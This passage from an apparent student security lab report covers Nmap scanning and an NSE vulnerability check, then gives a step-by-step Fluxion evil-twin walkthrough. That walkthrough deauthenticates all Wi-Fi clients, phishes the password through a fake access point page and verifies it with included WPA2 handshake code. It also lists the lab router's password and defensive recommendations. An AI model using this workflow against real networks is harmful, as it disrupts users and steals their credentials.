- Virtualization: VirtualBox 5.12
- Host OS: Windows 10 64-bit (192.168.0.15)
- Guest OS1: Kali Linux 2016.1 (10.0.2.15)
- Nmap (downloaded separately for the host OS; Kali Linux ships with Nmap pre-installed)

1.8. Nmap Screenshot


Below is a screenshot of the option summary printed by Nmap version 7.25 on Kali Linux.

Figure 11. Nmap Command Options (Target Specification, Host Discovery, Scan Techniques).

Below are screenshots of the option summary printed by Nmap version 7.50 on Windows. The target specification, host discovery and scan techniques sections are the same as in the Kali screenshot above, so these figures continue the option summary from where Figure 11 stops.

Figure 12. Nmap Command Options (Port Specifications, Service Detection, Script Scan, OS Detection).

Figure 13. Nmap Command Options (Timing, Firewall/IDS Evasion, Output).

1.9. Test Plan
Task ID | Task name or command line | Objective | Expected result | Actual result
1 | Run "nmap" | Test whether Nmap runs. | The Nmap option summary is shown. | The Nmap option summary is shown.
2 | Run "nmap [target]" | Find live hosts in the current local area network. | Several live hosts are found. | Several live hosts are found.
3 | Run "nmap -O --osscan-guess [target]" | Find the operating system of the machine. | The operating system in use is shown. | A list of candidate operating systems is shown.
4 | Run "nmap -A [target]" | Scan the target and gather information about the host. | Operating system, open ports, and the service and version running on each port are detected. | Operating system, open ports, and the service and version running on each port are detected.
5 | Scan the local area network for one vulnerability with the Nmap Scripting Engine | Find whether the vulnerability exists in the current local area network. | "Vulnerable" or "Not vulnerable" status is printed. | "Not vulnerable" status is printed.

1.10. Demonstration of Tool
In this demonstration the tester runs the tool both from Windows (the host) and from Kali Linux in VirtualBox.
Step 1: Check the network address (ipconfig/ifconfig)
Before Nmap can list the live hosts on the local area network it needs the network address to scan. The first command is therefore "ipconfig" on Windows and "ifconfig" on Kali Linux; the interface's IP address and subnet mask give the network range.

Figure 14. ipconfig and ifconfig command.

Step 2: Scan for live hosts ("nmap 192.168.0.*")
The previous step shows that the local area network is 192.168.0.0/24, with 192.168.0.1 as the gateway. The next command is therefore "nmap 192.168.0.*". The trailing star is a wildcard for the last octet, so Nmap scans 192.168.0.0 through 192.168.0.255 (the network and broadcast addresses are included; "192.168.0.1-254" would leave them out). Because no port option is given, Nmap first does host discovery and then scans its default set of the 1,000 most common TCP ports on each host that answers.

Figure 15. Windows Nmap found 4 hosts up.

Figure 16. Kali Nmap found 1 host up.

The figures above show that Nmap on Windows detected 4 hosts, because the host machine sits directly on the local area network, while Nmap in Kali detected only 1 host: its own Windows host, reached through the NAT engine. The cause is the virtual machine's network mode. The VirtualBox NAT adapter gives the guest outbound Internet access through the host but places it on its own private network (10.0.2.0/24), so the guest cannot reach the other machines on the 192.168.0.0 LAN. Switching the VM's adapter to bridged mode would put Kali directly on the LAN and give the same results as the Windows scan.

Step 3: Operating system scan ("nmap -O --osscan-guess 192.168.0.7")

From the host list above, the tester picks one machine for the operating system scan. Nmap on Windows scans 192.168.0.7, another laptop running Windows 8.1, while Nmap in Kali scans the host machine, 192.168.0.15.
The figure below shows that Nmap on Windows identifies 192.168.0.7 as Windows 7, Windows Server 2008 or Windows 8.1; the TCP/IP fingerprints of these versions are close, so "--osscan-guess" reports the candidates rather than one definite answer. Nmap in Kali, however, reports the host as Oracle VirtualBox rather than Windows 10. This is consistent with the NAT setup: the guest's packets to 192.168.0.15 are answered by VirtualBox's NAT engine, which has its own TCP/IP stack, so Nmap correctly fingerprints the virtualization layer rather than the Windows host behind it.

Figure 17. Operating System Scan

Step 4: Scan port service versions, host scripts and traceroute with aggressive mode
("nmap -A 192.168.0.7")

Figure 18. Nmap scan with -A options.

The scan above lists each open port with its service and version, and adds the output of the default NSE scripts run against the host (the "host script results" section). Here that includes details such as the Microsoft SQL Server instance, the NetBIOS name and the SMB security mode (message signing and authentication level), which are exactly the details an attacker would use to choose an exploit.

Step 5: Bulk vulnerability scan for CVE-2015-1635
("nmap -A -sV -oX "C:\Users\JuniorXR\Documents\scan1.xml" --script http-vuln-cve2015-1635.nse --script-args vulns.showall 192.168.0.*")
This command checks every host on the LAN for CVE-2015-1635 (MS15-034), a flaw in the Windows HTTP.sys kernel driver that allows remote code execution through a crafted HTTP request. The NSE script tests for it with a harmless malformed Range-header request and looks at how the server answers, rather than by exploiting it.
Command breakdown:
1. "-A" enables aggressive mode (OS detection, version detection, default scripts and traceroute), returning the same kind of result as the previous step.
2. "-sV" probes the version of the service running on each open port. It is already implied by "-A", so listing it again is harmless but redundant.
3. "-oX [filepath]" writes the results as XML, which is the format to use when the output will be processed by another tool.
4. "--script [script]" runs the named NSE script against every matching port; the ".nse" suffix is optional, so "--script http-vuln-cve2015-1635" is equivalent.
5. "--script-args vulns.showall" makes the vulns library report every check, including hosts found NOT VULNERABLE; by default only vulnerable results are printed.
6. "192.168.0.*" scans every address from 192.168.0.0 to 192.168.0.255.

Figure 19. Vulnerability scan results

The XML output above records the scan of network 192.168.0.*. It shows that 192.168.0.1 (MAC vendor D-Link International), the home residential gateway, has the hostname "WirelessAP" and runs an HTTP server on port 80. That is unsurprising, since the web interface is how a home user reaches the router configuration from a browser. Because the host has an HTTP service, Nmap ran the CVE-2015-1635 check specified in the command, and the result shows the service is NOT VULNERABLE. This is the expected verdict: CVE-2015-1635 is a bug in Microsoft's HTTP.sys, so the embedded web server of a consumer router, which does not run Windows, cannot be affected by it, and "not vulnerable" says nothing about other weaknesses that web interface may have. The check is meaningful against the Windows hosts on the network.
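The XML written by "-oX" is the form of the output that other tooling consumes. As an added example (not part of this report or of Nmap), the Python below parses such a file with the standard library and pulls out, per live host, the open ports and the state each NSE vuln script reported, then filters the hosts the vulns library marked VULNERABLE or LIKELY VULNERABLE. The embedded XML is a constructed sample modelled on the scan above (192.168.0.1, "WirelessAP", port 80, NOT VULNERABLE) plus a hypothetical second host 192.168.0.50 marked VULNERABLE so that the filter has something to flag; the MAC address and the script title text are made up.

```python
"""Parse Nmap -oX output and report NSE vuln-script results per host."""
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's XML layout (NOT a real scan file). The first host
# mirrors the scan described in the text; the second host and the MAC are made up.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -oX scan1.xml --script http-vuln-cve2015-1635 --script-args vulns.showall 192.168.0.*">
  <host><status state="up" reason="arp-response"/>
    <address addr="192.168.0.1" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac" vendor="D-Link International"/>
    <hostnames><hostname name="WirelessAP" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/>
        <script id="http-vuln-cve2015-1635" output="see table">
          <table key="CVE-2015-1635">
            <elem key="title">Remote Code Execution in HTTP.sys</elem>
            <elem key="state">NOT VULNERABLE</elem>
          </table>
        </script>
      </port>
    </ports>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="192.168.0.50" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/>
        <script id="http-vuln-cve2015-1635" output="see table">
          <table key="CVE-2015-1635"><elem key="state">VULNERABLE</elem></table>
        </script>
      </port>
      <port protocol="tcp" portid="135"><state state="closed" reason="reset"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/><address addr="192.168.0.2" addrtype="ipv4"/></host>
</nmaprun>"""

# States emitted by Nmap's vulns library that count as a finding
# ("VULNERABLE (Exploitable)" and "VULNERABLE (DoS)" also start with VULNERABLE).
FINDING_STATES = ("VULNERABLE", "LIKELY VULNERABLE")


def parse_nmap_xml(text: str) -> list:
    """Return one dict per host that is up: ip, hostname, vendor and its open ports.

    Each port carries the vuln-script results found under it as (script id, table key, state)."""
    hosts = []
    for h in ET.fromstring(text).iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = vendor = None
        for a in h.findall("address"):
            if a.get("addrtype") == "ipv4":
                ip = a.get("addr")
            elif a.get("addrtype") == "mac":
                vendor = a.get("vendor")
        hn = h.find("hostnames/hostname")
        ports = []
        for p in h.findall("ports/port"):
            if p.find("state").get("state") != "open":
                continue  # closed/filtered ports carry no script output worth keeping
            svc = p.find("service")
            vulns = [
                (s.get("id"), t.get("key"), t.findtext("elem[@key='state']"))
                for s in p.findall("script")
                for t in s.findall("table")
            ]
            ports.append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "vulns": vulns,
            })
        hosts.append({"ip": ip, "hostname": hn.get("name") if hn is not None else None,
                      "vendor": vendor, "ports": ports})
    return hosts


def findings(hosts: list) -> list:
    """Flatten to (ip, port, script id, state) for every result the vulns library flagged."""
    return [
        (h["ip"], port["port"], sid, state)
        for h in hosts
        for port in h["ports"]
        for sid, _key, state in port["vulns"]
        if state and state.startswith(FINDING_STATES)
    ]


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_XML)
    for h in parsed:
        print(h["ip"], h["hostname"], h["vendor"], [p["port"] for p in h["ports"]])
    print("findings:", findings(parsed))
```

Against a real file, replace SAMPLE_XML with the contents of scan1.xml; hosts that never ran the script simply have an empty vulns list, which is the case to watch for when a "clean" report is really a report of a script that never matched any port.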

Figure 20. Scan result.

Figure 21. Scan result.

1.11. Evaluation
The demonstration above shows that with Nmap the tester can scan numerous hosts, and a vulnerability on their open ports, in one single command. Although the result shows no HTTP server on the local area network vulnerable to CVE-2015-1635, the test meets its aims and objectives. It also supports the hypothesis that an attacker can find large numbers of vulnerable devices automatically: the same command, pointed at a larger address range, would check every reachable HTTP server for the flaw with no extra effort.
In this network scan the tester was unable to use Nmap from Kali Linux against the other machines. Kali ran as a virtual machine behind VirtualBox's NAT, which let it reach only its own host on the local area network; a bridged network adapter would have avoided this.
The scan from Windows succeeded because Windows is the host operating system and is connected directly to the local area network.

1.12. Suggested Solutions and Recommendation
Given Nmap's scanning ability, the only way to prevent scanning completely is to drop all incoming packets, which is not practical: a machine that offers any service on the Internet must have open ports, and those ports can be probed. The realistic defence is to deploy an Intrusion Detection System (IDS) or Intrusion Prevention System (IPS). Both can recognise malicious activity such as probes to many different ports arriving from the same source IP address within a short time, which is the signature of a default Nmap scan; an IPS can additionally block the source. Firewall rules should also be set properly so that no untrusted IP address can reach an open port it has no business using. Against other network scanners it is also worth blocking ICMP echo requests, because many scanners use ping as their first step to find live hosts. This has limits, however: on the local Ethernet segment Nmap discovers hosts with ARP requests, which cannot be blocked, and the "-Pn" option skips host discovery altogether and scans every address, so blocking ping delays a scan rather than defeating it. A slow scan (Nmap's "-T0" or "-T1" timing, or a scan spread across many source addresses) can also slip under a simple per-source threshold, so detection thresholds need to be tuned to the network.
From the defender's point of view Nmap is equally useful for penetration testing: it shows whether a machine is vulnerable or not. If Nmap detects a vulnerability in an existing machine, the administrator must update that vulnerable service as soon as possible to prevent exploitation.
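The "many ports from one source in a short time" rule that an IDS applies is simple enough to show in full. The Python below is an added example, not part of the report or of any IDS product: it runs a sliding-window detector over firewall log lines and flags a source once it has touched a threshold of distinct destination ports within the window. The log lines are constructed (iptables-style fields with an ISO timestamp, not a real capture) and contain a default-speed sweep like the "nmap 192.168.0.7" scan above, ordinary web traffic that must not be flagged, and a slow sweep that spaces its probes 30 seconds apart to show the threshold's blind spot.

```python
"""Flag port-sweep behaviour in firewall logs: the signature an IDS keys on."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# iptables-style log line with an ISO timestamp; only the fields used here are matched.
LINE = re.compile(r"^(?P<ts>\S+) .*?SRC=(?P<src>\S+) .*?DPT=(?P<dpt>\d+)")


def detect_port_scans(lines, threshold: int = 20, window_seconds: float = 10.0) -> dict:
    """Return {src_ip: (first_probe_time, distinct_ports)} for every source that hits at
    least `threshold` distinct destination ports within any window of `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # src -> deque of (timestamp, dst port), oldest first
    alerts = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        q = recent[m["src"]]
        q.append((ts, int(m["dpt"])))
        while ts - q[0][0] > window:  # slide the window forward, dropping old probes
            q.popleft()
        ports = {port for _, port in q}
        if len(ports) >= threshold and m["src"] not in alerts:
            alerts[m["src"]] = (q[0][0], len(ports))
    return alerts


def constructed_log() -> list:
    """Constructed sample (not a real capture): a default-speed sweep from 192.168.0.15,
    ordinary web traffic from 192.168.0.9, and a slow sweep from 192.168.0.77 that
    spaces its probes 30 s apart (what Nmap -T1 timing looks like)."""
    t0 = datetime(2017, 6, 25, 10, 0, 0)

    def line(ts, src, dpt):
        return (f"{ts.isoformat()} gw kernel: [FW-DROP] IN=br0 SRC={src} "
                f"DST=192.168.0.7 PROTO=TCP DPT={dpt} SYN")

    lines = []
    for i in range(40):  # 40 ports in 4 seconds: a default nmap scan
        lines.append(line(t0 + timedelta(milliseconds=100 * i), "192.168.0.15", 1 + i))
    for i in range(40):  # repeated hits on only two ports: not a sweep
        lines.append(line(t0 + timedelta(milliseconds=100 * i), "192.168.0.9", 80 if i % 2 else 443))
    for i in range(40):  # 40 ports spread over 20 minutes: slips under a 10 s window
        lines.append(line(t0 + timedelta(seconds=30 * i), "192.168.0.77", 1 + i))
    return lines


if __name__ == "__main__":
    for src, (first, n) in detect_port_scans(constructed_log()).items():
        print(f"{src}: {n} distinct ports starting {first:%H:%M:%S}")
```

With the default 10 second window only 192.168.0.15 is reported; widening the window to 30 minutes also catches 192.168.0.77, at the cost of more state per source, which is the trade-off every threshold-based scan detector has to make.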

1.13. Conclusion
To conclude, active network scanning is useful for checking the vulnerability of a machine. Administrators can check whether their local area network is secure, and if a vulnerability is found, the system administrator needs to update the system promptly so it is not exploited by an attacker. The testing above also shows that Nmap is a very powerful network scanning tool: it can scan many devices in one single command. While Nmap can be used for good purposes, it can equally be used by the wrong person to do malicious things. A system security administrator must therefore learn how to use Nmap and leverage its capabilities to find system vulnerabilities and secure them promptly.

1.14. References
angryip.org, 2017. Angry IP Scanner. [Online]
Available at: http://angryip.org/
[Accessed 25 June 2017].
Baloch, R., 2015. Ethical Hacking and Penetration Guide. 1 ed. Boca Raton: CRC Press.
Chickowski, E., 2015. 6 Most Dangerous New Attack Techniques in 2015. [Online]
Available at: http://www.darkreading.com/vulnerabilities---threats/6-most-dangerous-new-
attack-techniques-in-2015/d/d-id/1320120
[Accessed 25 June 2017].
Forlanda, J., 2010. Nessus vs Nmap. [Online]
Available at: http://www.brighthub.com/computing/smb-security/articles/72408.aspx
[Accessed 25 June 2017].
Nmap, 2017. Nmap: the Network Mapper. [Online]
Available at: https://nmap.org/
[Accessed 25 June 2017].
nmap, 2017. Scripts. [Online]
Available at: https://nmap.org/nsedoc/categories/vuln.html
[Accessed 25 June 2017].
Rouse, M., 2017. active reconnaissance. [Online]
Available at: http://whatis.techtarget.com/definition/active-reconnaissance
[Accessed 25 June 2017].
sirabhinavjain.com, 2016. Comparison of Network Security tools –NESSUS Vs NMAP. [Online]
Available at: http://sirabhinavjain.com/wp/comparison-of-network-security-tools-nessus-vs-
nmap/
[Accessed 25 June 2017].
Tenable, 2017. Plugins. [Online]
Available at: https://www.tenable.com/plugins/index.php?view=all
[Accessed 25 June 2017].

2. Cracking home router Wi-Fi password with Fluxion (Fawwas Hamdi
TP034298)
2.1. Introduction
In the current era of globalization, advances in communication technology are the main factor in how communities gain access to information. Wireless (cable-free) communication networks are one of the communication media still developing today. The provision of free wireless or Wi-Fi facilities in public places is a boon for some, but free public Wi-Fi is also a main target of cybercrime, so network security must not be treated as trivial.
Recently, hacker forums have been full of discussion about a program that is said to obtain a WPA2 wireless password without cracking the underlying algorithm. Fluxion is a program used as a wireless security testing tool for WPA2 networks. It combines several techniques commonly used to obtain information from users. Fluxion runs on Linux and has become popular because of its ease of use (Chaudhary, 2016).

2.2. Hypothesis
Wi-Fi uses radio waves in a public, licence-free part of the spectrum that anyone may use within certain limits. Each Wi-Fi network has a certain range, depending on the transmit power and the antenna used. This makes a variety of activities possible, but the researcher will focus on the Evil Twin attack. The researcher proposes this attack because it is very simple: it relies only on the Wi-Fi signal and on the security awareness of the victim. A Kali Linux virtual machine will be used as the attacking environment, and a wireless USB adapter is required to scan for Wi-Fi signals in the attacker's area. The vulnerability testing begins once the target Wi-Fi is found; the next step is to capture a handshake, which is used later to verify the password.
Once the handshake has been acquired, the next step is to create the fake AP. The fake AP is backed by a web interface through which the attacker obtains the real password: the web interface asks the victim to enter the password, and the attacker compares the entered password against the captured handshake. If the password matches the handshake, the attacker can gain access to the Wi-Fi. The attack therefore depends on the victim's security awareness; if the victim understands security and social engineering, the attack is pointless.

2.3. Aim
To use Fluxion to conduct vulnerability testing on the router with the intent of obtaining the Wi-Fi password, and to propose a solution to the vulnerability.

2.4. Objective
There are several objectives that the researcher wants to achieve:

1. Find out how Fluxion is able to exploit the vulnerability on the router.
2. Obtain the Wi-Fi password using Fluxion with a fake AP.
3. Find out how to prevent the problem that the vulnerability testing process reveals.

2.5. Tools
2.5.1. Hardware
These are the hardware items used to conduct the vulnerability testing.

1. Asus V551L
- Intel Core i7-4500U processor (4th generation)
- 8 GB RAM
- Windows 10
2. TP-LINK TL-WN722N Wi-Fi adapter
- Monitor mode supported
- IEEE 802.11n
- Works with Kali Linux
3. TP-LINK Archer C5 (the target router)
- IEEE 802.11 ac/n/g/b/a
- Dual band 2.4 GHz/5 GHz
- 2 antennas
- Password: sulsel2017

2.5.2. Software

1. VMware Workstation 12 Player

A virtual machine (VM) is an environment, usually a program or operating system, that is not physically present but runs inside another environment. The VM is called the "guest" and the environment that runs it the "host". The basic idea is to share the hardware of one computer (CPU, memory, disk and so on) among multiple execution environments, creating the illusion that each environment runs on its own separate computer (vmware, n.d.). This vulnerability testing uses VMware Workstation 12 Player because it is very easy to use and free.

2. Kali Linux 64 Bit

Kali Linux is an open source project maintained and funded by Offensive Security, a provider of information security training and penetration testing services. Those benefits are why it was chosen for this Wi-Fi hacking exercise: most of the popular tools can be installed easily on Kali Linux (Kali Linux, n.d.). Note that the wireless adapter must be passed through to the VM as a USB device, because the guest cannot put the host's built-in Wi-Fi card into monitor mode through the virtualized network adapter.
3. Fluxion 0.23
Fluxion is a mix of technical and social engineering automation that tricks users into handing over a Wi-Fi password in a matter of keystrokes. In particular, it is a social engineering framework that uses an evil twin access point, integrated jamming and handshake capture, so that the attack targets the user rather than any weakness in the hardware or the protocol. Tools like Wifiphisher perform similar attacks but lack the ability to verify the WPA password against a captured handshake (Chaudhary, 2016).
2.5.3. Comparison of tools for conducting the vulnerability testing
This section compares the chosen software with a similar application that could be used to conduct the same vulnerability testing.
2.5.3.1. Functions
LINSET is a tool that obtains a WPA or WPA2 Wi-Fi password without brute-forcing it from a wordlist. The technique it uses is the "Evil Twin" attack: the attacker creates a wireless network with the same name as the original, legitimate network (the "twin"), then either produces a stronger signal than the legitimate one or knocks the legitimate access point's clients off the air, by mounting a denial-of-service attack against the legitimate network or by creating radio frequency interference around it, so that the user is steered onto the attacker's network.
Fluxion is a development of LINSET with updated monitor-interface handling: it expects the wlan0mon-style interface name that airmon-ng creates in aircrack-ng 1.2 RC2 and later, rather than the older mon0 name (Sadmin, 2017).
2.5.3.2. Limitations
LINSET was not updated to match the monitor interface used by aircrack-ng 1.2 RC2 and above, which no longer creates mon0 but wlan0mon. This difference breaks LINSET for anyone running a current aircrack-ng: it is safe to say that LINSET will not work with a wlan0mon interface, because the scanning it relies on expects the old aircrack-ng monitor interface name (Sadmin, 2017).

2.6. Test Plan
To test the hypothesis, a test plan is needed to set out the tasks and help reach the researcher's target. The tasks are listed step by step, each with a description of how it supports the hypothesis and the result expected from it. The actual results are recorded in the evaluation (2.8).

Step | Task/command | Description | Expected result
1 | ./fluxion | Start Fluxion. | After the command is entered, Fluxion starts.
2 | Select language | Select the preferred language. | After the selection, the next step is shown.
3 | Select interface | Select the detected network interface. | After the selection, channel selection is shown; if no network interface is detected, Fluxion terminates.
4 | Select channel | Select the channel of the targeted Wi-Fi. | The target Wi-Fi is detected.
5 | Select the target | The target Wi-Fi is visible and ready to be selected. | The target is selected and the next step is shown.
6 | Select the attack method | The attack method will be FakeAP-Hostapd. | The selected attack is shown and the next step is shown.
7 | Handshake location | The location where the handshake will be stored. | The handshake location is set and the next step is shown.
8 | Handshake checking | Aircrack-ng captures and checks the handshake. | The handshake is captured by aircrack-ng.
9 | Fake AP deployed | Build the web interface for the fake AP. | The web interface is ready and the next step is shown.
10 | Obtain the password | The password is shown if it matches the captured handshake. | The password is shown after checking it against the captured handshake.
11 | Test the real password | Test the real password on the real AP. | Access to the Wi-Fi is gained.

2.7. Demonstration

Figure 22 Fluxion

Figure 22 shows that after the ./fluxion command is entered, the language selection appears. Select the preferred language to continue.

Figure 23 Network Card Selection

The network card list appears after the language selection. If no network card is detected, Fluxion terminates.

Figure 24 Scan Channel

Figure 24 shows that a channel must be selected to search for the targeted Wi-Fi. There are two options, all channels or specific channels; select all channels to capture every Wi-Fi network on the available channels.

Figure 25 Wifi Captured

Figure 25 shows that, because all channels were selected, every Wi-Fi network in range appears in the list.

Figure 26 Select Target

Figure 26 shows that the target has been scanned; select entry 80 to continue.

Figure 27 Select Attack type

The attack options are listed after the target is selected. Since the attack uses a fake AP, select option 1 to continue.

Figure 28 Handshake

Figure 28 shows where the handshake is stored after it is captured.

Figure 29 Handshake Checking

Aircrack-ng is used to check that the capture contains a complete 4-way handshake; without one, the password entered later cannot be verified.

Figure 30 Handshake Method

Select "Deauth all (mdk3)" to disconnect every user on the network. When the clients reconnect, their 4-way handshake with the real AP is captured; later, the same jamming keeps them off the real AP, so a victim who is not aware of the attack connects to the fake AP instead.

Figure 31 Capturing data

The capture is now running; once the handshake has been captured, the handshake field in the corner of the window is filled with the handshake value.

The handshake will be

Figure 32 Create interface for fake AP

Since the attack uses a fake AP, a web interface is needed for it, so that the victim can type the real password into the web page.

Figure 33 Password capturing

Figure 33 shows the password capturing process.

Figure 34 Fake AP detected

On the victim's machine the fake AP appears in the network list, and a victim who is not aware of the attack will choose it.

Figure 35 Web Interface

This is the web interface of the fake AP; the victim enters the password here in order to connect to the network.

Figure 36 Password Captured

Each password the victim enters at the fake AP web interface is checked against the handshake acquired earlier. If the password matches the handshake, it is shown as in Figure 36.

2.8. Evaluation
Evaluation is done manually against the test plan. The Fluxion script proceeds as follows:
A. Network scanning: Fluxion uses the network interface, already set to monitor mode, to scan nearby Wi-Fi networks. Once the target is chosen, the attack can start.
B. Handshake capture: the handshake is acquired with the aircrack-ng suite and stored, so that it can later be compared with the password the victim enters at the fake AP.
C. Web interface as the social engineering technique: the web interface convinces the victim to enter the password. The page collects the password and hands it to the checking process.
D. Fake access point matching the original: the fake AP appears in the victim's Wi-Fi list, and a victim who is not aware of the attack opens its web interface.
E. MDK3 process: it breaks the connections of all users on the network so that they connect to the fake AP and enter the real password.
F. Any password the victim enters is verified against the previously acquired handshake, and the process terminates automatically once the correct password has been entered.
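The comparison in step F (and the one described under Figure 36) is the computation aircrack-ng performs for Fluxion: derive the PMK from the candidate passphrase and SSID, expand it to the PTK with both MAC addresses and both nonces, and recompute the MIC of message 2 of the captured 4-way handshake; only the real passphrase reproduces the MIC, which is why a typed password can be confirmed instantly without any brute force. The Python below is an added example of that check, not Fluxion or aircrack-ng code. It leaves out the .cap parsing: the handshake fields are built in-code by constructed_capture(), whose MAC addresses, nonces and SSID are made up, while the passphrase is the one listed for the lab router in 2.5.1.

```python
"""Check a candidate WPA2-PSK passphrase against a captured 4-way handshake.

Added example; not Fluxion or aircrack-ng code. The 'capture' is constructed
in-code from a known passphrase so the check can run offline."""
import hashlib
import hmac
from typing import NamedTuple


class Handshake(NamedTuple):
    ssid: str
    ap_mac: bytes       # AA, the authenticator (AP) address
    sta_mac: bytes      # SPA, the supplicant (client) address
    anonce: bytes       # 32-byte nonce from message 1 (AP -> client)
    snonce: bytes       # 32-byte nonce from message 2 (client -> AP)
    eapol_msg2: bytes   # full 802.1X frame of message 2, MIC field included


# Offset of the 16-byte Key MIC inside an EAPOL-Key frame: 802.1X header (4) +
# descriptor type (1) + key info (2) + key length (2) + replay counter (8) +
# nonce (32) + IV (16) + RSC (8) + key ID (8).
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits) (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 160 bits covers the 512 bits needed
    )
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate: str, hs: Handshake) -> bool:
    """True when the candidate reproduces the MIC the client put on message 2."""
    if not 8 <= len(candidate) <= 63:  # WPA-PSK passphrase length limits
        return False
    pmk = pmk_from_passphrase(candidate, hs.ssid)
    kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]  # KCK = first 128 bits of PTK
    captured_mic = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), captured_mic)


def constructed_capture(real_passphrase: str = "sulsel2017", ssid: str = "Archer-C5-lab") -> Handshake:
    """Stand-in for a real capture: builds message 2 with a valid MIC under real_passphrase.
    MACs, nonces and the SSID are made up; the passphrase is the lab router's from 2.5.1."""
    aa, spa = bytes.fromhex("a0f3c1000001"), bytes.fromhex("b4b6760000aa")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_info = (0x010A).to_bytes(2, "big")  # pairwise, MIC bit set, descriptor version 2
    body = (b"\x02" + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8      # IV, RSC, key ID
            + b"\x00" * 16 + (0).to_bytes(2, "big"))                 # MIC placeholder, key data length
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body        # 802.1X v1, type EAPOL-Key
    kck = ptk_from_pmk(pmk_from_passphrase(real_passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return Handshake(ssid, aa, spa, anonce, snonce, frame)


if __name__ == "__main__":
    hs = constructed_capture()
    for guess in ("password123", "sulsel2016", "sulsel2017"):
        print(f"{guess!r}: {'MATCH' if passphrase_matches(guess, hs) else 'no'}")
```

Against a real capture the six fields of Handshake are read from the airodump-ng .cap file (the AP and client MACs from the 802.11 headers, the nonces and message 2 from the EAPOL-Key frames); the verification itself is unchanged. The 4096-round PBKDF2 is what makes a wordlist attack on the same handshake slow, and why Fluxion prefers to ask the user for the passphrase instead.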

Step | Task/command | Description | Expected result | Actual result
1 | ./fluxion | Start Fluxion. | After the command is entered, Fluxion starts. | Fluxion is running.
2 | Select language | Select the preferred language. | After the selection, the next step is shown. | The language selection succeeds and the next step is shown.
3 | Select interface | Select the detected network interface. | After the selection, channel selection is shown; if no network interface is detected, Fluxion terminates. | The interface is detected; Fluxion can now scan the network to find the target.
4 | Select channel | Select the channel of the targeted Wi-Fi. | The target Wi-Fi is detected. | The selected channel shows all Wi-Fi networks scanned near the attacker's location.
5 | Select the target | The target Wi-Fi is visible and ready to be selected. | The target is selected and the next step is shown. | The target is acquired and ready to be exploited.
6 | Select the attack method | The attack method will be FakeAP-Hostapd. | The selected attack is shown and the next step is shown. | The attack option is shown; the password is obtained successfully.
7 | Handshake location | The location where the handshake will be stored. | The handshake location is set and the next step is shown. | -
8 | Handshake checking | Aircrack-ng captures and checks the handshake. | The handshake is captured by aircrack-ng. | The handshake is acquired successfully with aircrack-ng.
9 | Fake AP deployed | Build the web interface for the fake AP. | The web interface is ready and the next step is shown. | The fake AP appears in the Wi-Fi list of the victim machine.
10 | Obtain the password | The password is shown if it matches the captured handshake. | The password is shown after checking it against the captured handshake. | The password is obtained because the victim entered it in the fake AP web interface.
11 | Test the real password | Test the real password on the real AP. | Access to the Wi-Fi is gained. | The real password entered by the victim at the web interface matches the captured handshake.

2.9. Suggested solution and recommendations

1. Perform wireless network testing.

Test the wireless network periodically for vulnerability to the various types of attack, to make sure the network is able to minimise attacks and to detect illegal users or a rogue access point.

2. Turn off SSID broadcasting.

An access point sends out a code that announces its presence. This code, the Extended Service Set Identifier (ESSID or SSID), is the name used to refer to the wireless network; its purpose is to help clients find the access point. By default the SSID is broadcast, which lets users find the network because it appears in the client's list of available networks. The SSID is also a weak point often used by intruders: with the ESSID broadcast, intruders can find the access point and plan further attacks. If broadcasting is turned off, a user must know the SSID beforehand to connect, so on a point-to-point or private wireless network it is worth disabling; each client then has to have the SSID entered manually, and without the right ESSID the client cannot connect. This should be treated as a convenience measure rather than a real defence, however: a hidden SSID still appears in the probe requests and association frames of every legitimate client, so a monitor-mode tool such as airodump-ng recovers it as soon as one client connects, and an evil twin can then broadcast the same name.

3. Isolate the wireless network from the LAN.

